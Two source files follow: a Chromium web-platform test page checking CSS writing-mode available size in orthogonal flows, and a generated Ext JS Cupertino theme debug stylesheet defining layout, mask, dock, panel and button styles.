third_party/blink/web_tests/external/wpt/css/css-writing-modes/available-size-009.html
|
chromium/chromium
|
<!DOCTYPE html>
<meta charset="utf-8">
<title>Testing Available Space in Orthogonal Flows / ICB / tall height scroller</title>
<link rel="author" title="Florian Rivoal" href="https://florian.rivoal.net/">
<link rel="help" href="https://www.w3.org/TR/css-writing-modes-3/#orthogonal-auto">
<link rel="match" href="reference/available-size-002-ref.html">
<meta name="assert" content="When an orthogonal flow's parent doesn't have a definite block size, and there's a scroller with height, but that scroller is taller than the ICB, use the ICB instead.">
<style>
body { margin-top: 0; margin-bottom: 0; } /* Shouldn't matter, but in some browsers does. -007 tests this aspect specifically. */
:root { overflow: hidden; }
#ortho {
writing-mode: vertical-rl;
font-family: monospace;
font-size: 20px;
position: relative; /* to be a container for #red*/
}
.spacer { /* using 5 spacers of 20vh each instead of a single large one, so
that the line would wrap between spacers if it ends up being
shorter than 100vh*/
display: inline-block;
height: calc(20vh - 0.1px); /*Using this instead of 20vh, to account for accumulation of rounding errors, that might make 5*20vh taller than 100vh in some browsers*/
}
span {
background: green;
display: inline-block; /* This should not change it's size or position, but makes the size of the background predictable*/
color: transparent;
}
#red { /* Not necessary when when comparing to the reference, but makes human judgement easier */
position: absolute;
background: red;
writing-mode: vertical-rl;
z-index: -1;
font-family: monospace;
font-size: 20px;
left: 0; top: 0;
}
#scroller {
overflow: hidden;
writing-mode: vertical-lr;
height: 120vh;
}
#parent {
writing-mode: horizontal-tb;
width: 8em; /* avoid triggering intrinsic sizing bugs */
}
</style>
<p>Test passes if there is a <strong>green rectangle</strong> below and <strong>no red</strong>.
<div id=scroller>
<div id=parent>
<div id=ortho><aside id="red">0</aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside><aside class="spacer"></aside> <span>0</span></div>
</div>
</div>
|
backend/webapp/ext/build/modern/theme-cupertino/resources/theme-cupertino-all-rtl-debug.css
|
sqlwang/DeviceManagementSystem
|
/* http://localhost:1843/modern/theme-base/sass/src/scroll/Indicator.scss:1 */
.x-scroll-indicator {
position: absolute;
z-index: 3;
background-color: #000;
opacity: 0.5;
border-radius: 3px;
margin: 2px;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/Indicator.scss:11 */
.x-scroll-indicator-x {
bottom: 0;
left: 0;
height: 6px;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/Indicator.scss:17 */
.x-scroll-indicator-y {
right: 0;
top: 0;
width: 6px;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/Indicator.scss:25 */
.x-list-light .x-scroll-indicator,
.x-dataview-light .x-scroll-indicator {
background: #fff;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/TouchScroller.scss:1 */
.x-scroll-view {
position: relative;
display: block;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/TouchScroller.scss:7 */
.x-scroll-container {
position: absolute;
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/TouchScroller.scss:13 */
.x-scroll-scroller {
position: absolute;
min-width: 100%;
min-height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/scroll/TouchScroller.scss:21 */
.x-scroll-scroller:not(.x-grid-scrollelement) {
height: auto !important;
width: auto !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:1 */
html,
body {
font-family: "Helvetica Neue", HelveticaNeue, "Helvetica-Neue", Helvetica, "BBAlpha Sans", sans-serif;
font-weight: normal;
-webkit-text-size-adjust: none;
margin: 0;
cursor: default;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:10 */
body,
div,
dl,
dt,
dd,
ul,
ol,
li,
h1,
h2,
h3,
h4,
h5,
h6,
pre,
code,
form,
fieldset,
legend,
input,
textarea,
p,
blockquote,
th,
td {
margin: 0;
padding: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:17 */
table {
border-collapse: collapse;
border-spacing: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:22 */
fieldset,
img {
border: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:26 */
address,
caption,
cite,
code,
dfn,
em,
strong,
th,
var {
font-style: normal;
font-weight: normal;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:31 */
li {
list-style: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:35 */
caption,
th {
text-align: left;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:39 */
h1,
h2,
h3,
h4,
h5,
h6 {
font-size: 100%;
font-weight: normal;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:44 */
q:before,
q:after {
content: '';
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:49 */
abbr,
acronym {
border: 0;
font-variant: normal;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:54 */
sup {
vertical-align: text-top;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:58 */
sub {
vertical-align: text-bottom;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:62 */
input,
textarea,
select {
font-family: inherit;
font-size: inherit;
font-weight: inherit;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:68 */
*:focus {
outline: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:72 */
body.x-desktop {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:76 */
@-ms-viewport {
width: device-width;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:80 */
*,
*:after,
*:before {
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
-webkit-tap-highlight-color: transparent;
-webkit-touch-callout: none;
-webkit-user-drag: none;
-webkit-user-select: none;
-ms-user-select: none;
-ms-touch-action: none;
-moz-user-select: -moz-none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:91 */
input,
textarea {
-webkit-user-select: text;
-ms-user-select: auto;
-moz-user-select: text;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:97 */
.x-hidden-visibility {
visibility: hidden !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:101 */
.x-hidden-display,
.x-field-hidden {
display: none !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:105 */
.x-hidden-offsets {
position: absolute !important;
left: -10000em;
top: -10000em;
visibility: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:112 */
.x-no-touch-scroll {
touch-action: none;
-ms-touch-action: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:121 */
.x-html {
-webkit-user-select: auto;
-webkit-touch-callout: inherit;
-ms-user-select: auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:126 */
.x-html ul li {
list-style-type: circle;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:129 */
.x-html ol li {
list-style-type: decimal;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:134 */
@-webkit-keyframes x-loading-spinner-rotate {
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:135 */
0% {
-webkit-transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:136 */
8.32% {
-webkit-transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:138 */
8.33% {
-webkit-transform: rotate(30deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:139 */
16.65% {
-webkit-transform: rotate(30deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:141 */
16.66% {
-webkit-transform: rotate(60deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:142 */
24.99% {
-webkit-transform: rotate(60deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:144 */
25% {
-webkit-transform: rotate(90deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:145 */
33.32% {
-webkit-transform: rotate(90deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:147 */
33.33% {
-webkit-transform: rotate(120deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:148 */
41.65% {
-webkit-transform: rotate(120deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:150 */
41.66% {
-webkit-transform: rotate(150deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:151 */
49.99% {
-webkit-transform: rotate(150deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:153 */
50% {
-webkit-transform: rotate(180deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:154 */
58.32% {
-webkit-transform: rotate(180deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:156 */
58.33% {
-webkit-transform: rotate(210deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:157 */
66.65% {
-webkit-transform: rotate(210deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:159 */
66.66% {
-webkit-transform: rotate(240deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:160 */
74.99% {
-webkit-transform: rotate(240deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:162 */
75% {
-webkit-transform: rotate(270deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:163 */
83.32% {
-webkit-transform: rotate(270deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:165 */
83.33% {
-webkit-transform: rotate(300deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:166 */
91.65% {
-webkit-transform: rotate(300deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:168 */
91.66% {
-webkit-transform: rotate(330deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:169 */
100% {
-webkit-transform: rotate(330deg);
}
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:172 */
@keyframes x-loading-spinner-rotate {
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:173 */
0% {
-ms-transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:174 */
8.32% {
-ms-transform: rotate(0deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:176 */
8.33% {
-ms-transform: rotate(30deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:177 */
16.65% {
-ms-transform: rotate(30deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:179 */
16.66% {
-ms-transform: rotate(60deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:180 */
24.99% {
-ms-transform: rotate(60deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:182 */
25% {
-ms-transform: rotate(90deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:183 */
33.32% {
-ms-transform: rotate(90deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:185 */
33.33% {
-ms-transform: rotate(120deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:186 */
41.65% {
-ms-transform: rotate(120deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:188 */
41.66% {
-ms-transform: rotate(150deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:189 */
49.99% {
-ms-transform: rotate(150deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:191 */
50% {
-ms-transform: rotate(180deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:192 */
58.32% {
-ms-transform: rotate(180deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:194 */
58.33% {
-ms-transform: rotate(210deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:195 */
66.65% {
-ms-transform: rotate(210deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:197 */
66.66% {
-ms-transform: rotate(240deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:198 */
74.99% {
-ms-transform: rotate(240deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:200 */
75% {
-ms-transform: rotate(270deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:201 */
83.32% {
-ms-transform: rotate(270deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:203 */
83.33% {
-ms-transform: rotate(300deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:204 */
91.65% {
-ms-transform: rotate(300deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:206 */
91.66% {
-ms-transform: rotate(330deg);
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:207 */
100% {
-ms-transform: rotate(330deg);
}
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:210 */
.x-shim {
position: absolute;
left: 0;
top: 0;
overflow: hidden;
filter: progid:DXImageTransform.Microsoft.Alpha(Opacity=0);
opacity: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Component.scss:218 */
.x-css-shadow {
position: absolute;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-ms-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:1 */
html,
body {
position: relative;
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:8 */
.x-fullscreen {
position: absolute !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:12 */
.x-body {
position: relative;
z-index: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:17 */
.x-inner,
.x-body {
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:23 */
.x-sized {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Abstract.scss:27 */
.x-innerhtml {
width: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:5 */
.x-layout-box {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:8 */
.x-layout-box.x-horizontal {
-webkit-box-orient: horizontal !important;
-ms-flex-direction: row !important;
flex-direction: row !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:11 */
.x-layout-box.x-horizontal > .x-layout-box-item.x-flexed {
min-width: 0 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:16 */
.x-layout-box.x-vertical {
-webkit-box-orient: vertical !important;
-ms-flex-direction: column !important;
flex-direction: column !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:19 */
.x-layout-box.x-vertical > .x-layout-box-item.x-flexed {
min-height: 0 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:24 */
.x-layout-box > .x-layout-box-item {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:28 */
.x-layout-box.x-align-start {
-webkit-box-align: start;
-ms-flex-align: start;
align-items: flex-start;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:32 */
.x-layout-box.x-align-center {
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:36 */
.x-layout-box.x-align-end {
-webkit-box-align: end;
-ms-flex-align: end;
align-items: flex-end;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:40 */
.x-layout-box.x-align-stretch {
-webkit-box-align: stretch;
-ms-flex-align: stretch;
align-items: stretch;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:44 */
.x-layout-box.x-pack-start {
-webkit-box-pack: start;
-ms-flex-pack: start;
justify-content: flex-start;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:48 */
.x-layout-box.x-pack-center {
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:52 */
.x-layout-box.x-pack-end {
-webkit-box-pack: end;
-ms-flex-pack: end;
justify-content: flex-end;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:56 */
.x-layout-box.x-pack-justify {
-webkit-box-pack: justify;
-ms-flex-pack: justify;
justify-content: space-between;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:62 */
.x-layout-box-item.x-sized > .x-inner,
.x-layout-box-item.x-sized > .x-body,
.x-layout-box-item.x-sized > .x-dock-outer {
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:71 */
.x-webkit .x-layout-box.x-horizontal > .x-layout-box-item.x-flexed {
width: 0 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:75 */
.x-webkit .x-layout-box.x-vertical > .x-layout-box-item.x-flexed {
height: 0 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:84 */
.x-firefox .x-stretched.x-dock-horizontal > .x-dock-body {
width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:90 */
.x-firefox .x-stretched.x-dock-vertical > .x-dock-body {
height: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:98 */
.x-firefox .x-container .x-dock-horizontal.x-unsized .x-dock-body {
-webkit-box-flex: 1;
-ms-flex: 1 0 0px;
flex: 1 0 0px;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Box.scss:107 */
.x-firefox .x-has-height > .x-dock.x-unsized.x-dock-vertical > .x-dock-body {
height: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Card.scss:5 */
.x-layout-card {
position: relative;
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Card.scss:10 */
.x-layout-card-perspective {
-webkit-perspective: 1000px;
-ms-perspective: 1000px;
perspective: 1000px;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Card.scss:16 */
.x-layout-card-item-container {
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Card.scss:20 */
.x-layout-card-item {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
position: absolute !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:5 */
.x-stretched.x-container {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:9 */
.x-stretched.x-container > .x-inner,
.x-stretched.x-container > .x-body,
.x-stretched.x-container > .x-body > .x-inner {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
min-height: 0px;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:18 */
.x-layout-fit.x-stretched > .x-layout-fit-item {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:25 */
.x-layout-fit {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:30 */
.x-layout-fit-item.x-sized {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:34 */
.x-layout-fit-item.x-unsized {
width: 100%;
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Fit.scss:44 */
.x-ie .x-stretched > .x-inner,
.x-ie .x-stretched > .x-body {
min-height: inherit;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:5 */
.x-center,
.x-centered {
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:12 */
.x-center > *,
.x-centered > * {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:16 */
.x-center > .x-floating,
.x-centered > .x-floating {
position: relative !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:21 */
.x-floating {
position: absolute !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:25 */
.x-layout-float {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:28 */
.x-layout-float > .x-layout-float-item {
float: left;
}
/* http://localhost:1843/modern/theme-base/sass/src/layout/Float.scss:33 */
.x-layout-float.x-direction-right > .x-layout-float-item {
float: right;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:5 */
.x-mask {
min-width: 8.5em;
position: absolute;
top: 0;
left: 0;
bottom: 0;
right: 0;
height: 100%;
z-index: 10;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
background: rgba(0, 0, 0, 0.3) center center no-repeat;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:22 */
.x-mask.x-mask-gray {
background-color: rgba(0, 0, 0, 0.5);
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:26 */
.x-mask.x-mask-transparent {
background-color: transparent;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:30 */
.x-mask .x-mask-inner {
position: relative;
background: rgba(0, 0, 0, 0.25);
color: #fff;
text-align: center;
padding: .4em;
font-size: .95em;
font-weight: bold;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:40 */
.x-mask .x-loading-spinner-outer {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
-webkit-box-pack: center;
-ms-flex-pack: center;
justify-content: center;
width: 100%;
min-width: 8em;
height: 8em;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:51 */
.x-mask.x-indicator-hidden .x-mask-inner {
padding-bottom: 0 !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:54 */
.x-mask.x-indicator-hidden .x-loading-spinner-outer {
display: none;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:58 */
.x-mask.x-indicator-hidden .x-mask-message {
position: relative;
bottom: .25em;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:64 */
.x-mask .x-mask-message {
position: absolute;
bottom: 5px;
color: #333;
left: 0;
right: 0;
-webkit-box-flex: 0;
-ms-flex: 0 0 auto;
flex: 0 0 auto;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:74 */
.x-mask.x-has-message .x-mask-inner {
padding-bottom: 2em;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:78 */
.x-mask.x-has-message .x-loading-spinner-outer {
height: 168px;
}
/* http://localhost:1843/modern/theme-base/sass/src/Mask.scss:94 */
.x-ie .x-mask[visibility='visible'] ~ div:not(.x-mask) .x-input-el,
.x-ie .x-mask[visibility='visible'] ~ div:not(.x-panel) .x-input-el,
.x-ie .x-mask[visibility='visible'] ~ div:not(.x-floating) .x-input-el,
.x-ie .x-mask[visibility='visible'] ~ div:not(.x-center) .x-input-el,
.x-ie .x-mask[visibility='visible'] ~ div:not(.x-msgbox) .x-input-el,
.x-ie .x-mask:not(.x-item-hidden) ~ div:not(.x-mask) .x-input-el,
.x-ie .x-mask:not(.x-item-hidden) ~ div:not(.x-panel) .x-input-el,
.x-ie .x-mask:not(.x-item-hidden) ~ div:not(.x-floating) .x-input-el,
.x-ie .x-mask:not(.x-item-hidden) ~ div:not(.x-center) .x-input-el,
.x-ie .x-mask:not(.x-item-hidden) ~ div:not(.x-msgbox) .x-input-el {
visibility: collapse;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:5 */
.x-dock {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:8 */
.x-dock > .x-dock-body {
overflow: hidden;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:12 */
.x-dock.x-sized,
.x-dock.x-sized > .x-dock-body > *,
.x-dock.x-sized > .x-dock-body > .x-body > .x-inner {
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:17 */
.x-dock.x-sized > .x-dock-body {
position: relative;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:25 */
.x-dock.x-unsized,
.x-dock.x-stretched {
height: 100%;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:29 */
.x-dock.x-unsized > .x-dock-body,
.x-dock.x-stretched > .x-dock-body {
position: relative;
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:37 */
.x-dock.x-unsized > .x-dock-body > *,
.x-dock.x-stretched > .x-dock-body > * {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:45 */
.x-dock.x-dock-vertical {
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:49 */
.x-dock.x-dock-horizontal {
-webkit-box-orient: horizontal !important;
-ms-flex-direction: row !important;
flex-direction: row !important;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:52 */
.x-dock.x-dock-horizontal > .x-dock-item {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:56 */
.x-dock.x-dock-horizontal > .x-dock-item.x-sized > .x-inner,
.x-dock.x-dock-horizontal > .x-dock-item.x-sized > .x-body {
width: auto;
height: auto;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:61 */
.x-dock.x-dock-horizontal > .x-dock-item.x-unsized {
-webkit-box-orient: vertical;
-ms-flex-direction: column;
flex-direction: column;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:64 */
.x-dock.x-dock-horizontal > .x-dock-item.x-unsized > * {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
min-height: 0;
min-width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:79 */
.x-ie .x-stretched.x-dock-horizontal > .x-dock-body {
width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:85 */
.x-ie .x-stretched.x-dock-vertical > .x-dock-body {
height: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:92 */
.x-ie .x-has-width > .x-dock.x-unsized.x-dock-horizontal > .x-dock-body {
width: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/Container.scss:98 */
.x-ie .x-has-height > .x-dock.x-unsized.x-dock-vertical > .x-dock-body {
height: 0;
}
/* http://localhost:1843/modern/theme-base/sass/src/viewport/Viewport.scss:42 */
#ext-viewport {
margin: 0;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}
/* http://localhost:1843/modern/theme-base/sass/src/Panel.scss:5 */
.x-panel,
.x-msgbox {
position: relative;
}
/* http://localhost:1843/modern/theme-base/sass/src/Panel.scss:13 */
.x-panel.x-floating .x-panel-inner,
.x-panel.x-floating > .x-body,
.x-msgbox .x-panel-inner,
.x-msgbox > .x-body,
.x-form.x-floating .x-panel-inner,
.x-form.x-floating > .x-body {
z-index: 1;
}
/* http://localhost:1843/modern/theme-base/sass/src/Panel.scss:19 */
.x-panel.x-floating > .x-dock,
.x-msgbox > .x-dock,
.x-form.x-floating > .x-dock {
z-index: 1;
}
/* http://localhost:1843/modern/theme-base/sass/src/Panel.scss:25 */
.x-panel.x-floating > .x-dock.x-sized,
.x-msgbox > .x-dock.x-sized,
.x-form.x-floating > .x-dock.x-sized {
margin: 6px;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:5 */
.x-button,
.x-tab {
display: flex;
display: -webkit-box;
display: -ms-flexbox;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
position: relative;
overflow: hidden;
z-index: 1;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:14 */
.x-button.x-hasbadge,
.x-tab.x-hasbadge {
overflow: visible;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:19 */
.x-button-icon {
position: relative;
background-repeat: no-repeat;
background-position: center;
text-align: center;
}
/* http://localhost:1843/modern/theme-base/sass/src/Button.scss:26 */
.x-button-icon.x-shown {
display: block;
}
